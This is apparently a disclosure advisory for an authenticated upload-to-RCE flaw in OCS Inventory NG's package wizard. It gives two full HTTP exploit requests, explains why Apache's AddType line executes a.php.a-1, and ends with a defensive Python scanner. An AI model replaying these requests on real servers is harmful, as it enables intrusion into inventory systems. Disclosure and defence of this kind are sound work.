OCS Inventory NG suffers from an authenticated remote code execution vulnerability in ocsreports: the package-creation function (index.php?function=tele_package) lets an authenticated user upload a file into the ocsreports web root under a directory name of their choosing, and the shipped Apache configuration then executes that file as PHP.
## Request 1
This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory. The document_root field fixes the base directory and the timestamp field (which the form normally fills with a Unix timestamp) names the subdirectory, so the attacker can place the upload inside the web root under an arbitrary name. The teledeploy_file part is labelled exploit.zip with a zip Content-Type, but its body is plain PHP; neither the name nor the declared type is checked against the contents.
POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------491299511942
Content-Length: 2836
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------491299511942
Content-Disposition: form-data; name="CSRF_10"

8ab3df2f9a2078530027e74191af0b087429ad41
-----------------------------491299511942
Content-Disposition: form-data; name="document_root"

/usr/share/ocsinventory-reports/ocsreports/
-----------------------------491299511942
Content-Disposition: form-data; name="timestamp"

a.php.a
-----------------------------491299511942
Content-Disposition: form-data; name="NAME"

dshasdgasga
-----------------------------491299511942
Content-Disposition: form-data; name="DESCRIPTION"

asdgasdga
-----------------------------491299511942
Content-Disposition: form-data; name="OS"

WINDOWS
-----------------------------491299511942
Content-Disposition: form-data; name="PROTOCOLE"

HTTP
-----------------------------491299511942
Content-Disposition: form-data; name="PRIORITY"

5
-----------------------------491299511942
Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"
Content-Type: application/x-zip-compressed

<?php
phpinfo();
?>
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION"

EXECUTE
-----------------------------491299511942
Content-Disposition: form-data; name="ACTION_INPUT"

asdgasdgasdg
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_USE"

0
-----------------------------491299511942
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

d:\tele_ocs
-----------------------------491299511942
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

5
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_USER"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_TEXT"


-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"


-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION"

0
-----------------------------491299511942
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"


-----------------------------491299511942
Content-Disposition: form-data; name="valid"

Send
-----------------------------491299511942
Content-Disposition: form-data; name="digest_algo"

MD5
-----------------------------491299511942
Content-Disposition: form-data; name="digest_encod"

Hexa
-----------------------------491299511942
Content-Disposition: form-data; name="download_rep_creat"

/var/www/html/download/server/
-----------------------------491299511942--
## Request 2
This request completes the package wizard (VALID_END): it renames the uploaded file to a.php.a-1, the name of the package's first and only fragment (nbfrags=1), and writes the package's info file next to it. The digest and SIZE fields describe the file uploaded in Request 1.
POST /ocsreports/index.php?function=tele_package HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 3345
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------4827543632391
Content-Disposition: form-data; name="CSRF_13"

53b6eab749060aa8cbe972e9c9a31ae148cf886b
-----------------------------4827543632391
Content-Disposition: form-data; name="tailleFrag"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="nbfrags"

1
-----------------------------4827543632391
Content-Disposition: form-data; name="comment"

asdgasdga
-----------------------------4827543632391
Content-Disposition: form-data; name="digest"

b14f8d3b56fb10f2257f53ab32947a50
-----------------------------4827543632391
Content-Disposition: form-data; name="VALID_END"

END
-----------------------------4827543632391
Content-Disposition: form-data; name="SIZE"

347
-----------------------------4827543632391
Content-Disposition: form-data; name="document_root"

/usr/share/ocsinventory-reports/ocsreports/
-----------------------------4827543632391
Content-Disposition: form-data; name="timestamp"

a.php.a
-----------------------------4827543632391
Content-Disposition: form-data; name="NAME"

dshasdgasga
-----------------------------4827543632391
Content-Disposition: form-data; name="DESCRIPTION"


-----------------------------4827543632391
Content-Disposition: form-data; name="OS"

WINDOWS
-----------------------------4827543632391
Content-Disposition: form-data; name="PROTOCOLE"

HTTP
-----------------------------4827543632391
Content-Disposition: form-data; name="PRIORITY"

5
-----------------------------4827543632391
Content-Disposition: form-data; name="teledeploy_file"; filename=""
Content-Type: application/octet-stream


-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION"

EXECUTE
-----------------------------4827543632391
Content-Disposition: form-data; name="ACTION_INPUT"

asdgasdgasdg
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_USE"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"

d:\tele_ocs
-----------------------------4827543632391
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"

5
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_USER"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_TEXT"


-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"


-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION"

0
-----------------------------4827543632391
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"


-----------------------------4827543632391
Content-Disposition: form-data; name="digest_algo"

MD5
-----------------------------4827543632391
Content-Disposition: form-data; name="digest_encod"

Hexa
-----------------------------4827543632391
Content-Disposition: form-data; name="download_rep_creat"

/var/www/html/download/server/
-----------------------------4827543632391--
# Apache Config
The application ships the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:
AddType application/x-httpd-php .php
mod_mime treats every dot-separated part of a file name as an extension and applies each one it recognises in turn; an extension it does not know, such as .a-1, is simply ignored. So a.php.a-1 is still typed application/x-httpd-php and handed to the PHP module even though it does not end in .php. In general, any file name carrying .php as one of its extensions is executed, unless an extension further to the right is mapped to some other type. The uploaded file is therefore reachable, and executed, at http://192.168.5.135/ocsreports/a.php.a/a.php.a-1
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext
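An added model of the multiple-extension rule referenced above, so the a.php.a-1 behaviour can be reasoned about and checked for. This is example code, not part of the advisory: the extension table is an assumed stand-in for the server's TypesConfig plus the AddType line quoted above, and the hardened mapping it compares against is the FilesMatch form from the PHP manual's Apache instructions, which only honours a trailing .php. The scan_tree helper walks the ocsreports directory and lists files that the AddType configuration would execute but the FilesMatch one would not.

```python
import os
import re

# Added example, not part of the advisory. Models the mod_mime multiple-extension
# rule: extensions are examined left to right, each known one sets the type, so
# the rightmost extension mod_mime knows decides and unknown ones (".a-1") are
# skipped. Matching is case-insensitive. TYPES is an assumed stand-in for
# TypesConfig plus the AddType line quoted above.
TYPES = {
    ".php": "application/x-httpd-php",   # AddType application/x-httpd-php .php
    ".txt": "text/plain",                # from the default mime.types (assumed)
    ".zip": "application/zip",
    ".html": "text/html",
}

# Hardened mapping (PHP manual's Apache instructions, not from the advisory):
# only the final extension counts, so a.php.a-1 is never executed.
#   <FilesMatch "\.php$">
#       SetHandler application/x-httpd-php
#   </FilesMatch>
HARDENED = re.compile(r"\.php$")


def mod_mime_type(filename, types=TYPES):
    """Type mod_mime would assign to the last path component of filename."""
    mime = None
    for ext in os.path.basename(filename).split(".")[1:]:   # [0] is the stem
        mime = types.get("." + ext.lower(), mime)           # known ext overrides
    return mime


def runs_as_php_addtype(filename):
    """Executed under the vulnerable AddType configuration?"""
    return mod_mime_type(filename) == "application/x-httpd-php"


def runs_as_php_filesmatch(filename):
    """Executed under the hardened FilesMatch configuration?"""
    return HARDENED.search(os.path.basename(filename)) is not None


def suspicious(names):
    """Names executed under AddType but not under FilesMatch: the a.php.a-1 pattern."""
    return [n for n in names if runs_as_php_addtype(n) and not runs_as_php_filesmatch(n)]


def scan_tree(root):
    """Defender check: list such files anywhere below root."""
    found = []
    for dirpath, _, files in os.walk(root):
        found += [os.path.join(dirpath, f) for f in files]
    return suspicious(found)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr/share/ocsinventory-reports/ocsreports"
    for path in scan_tree(root):
        print(path)
```

Note that a.php.txt is typed text/plain by the model, because .txt is a known extension to the right of .php; this is why the rule is "a .php extension not followed by a mapped one" rather than "any name containing .php".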
Regards,
Simon Uvarov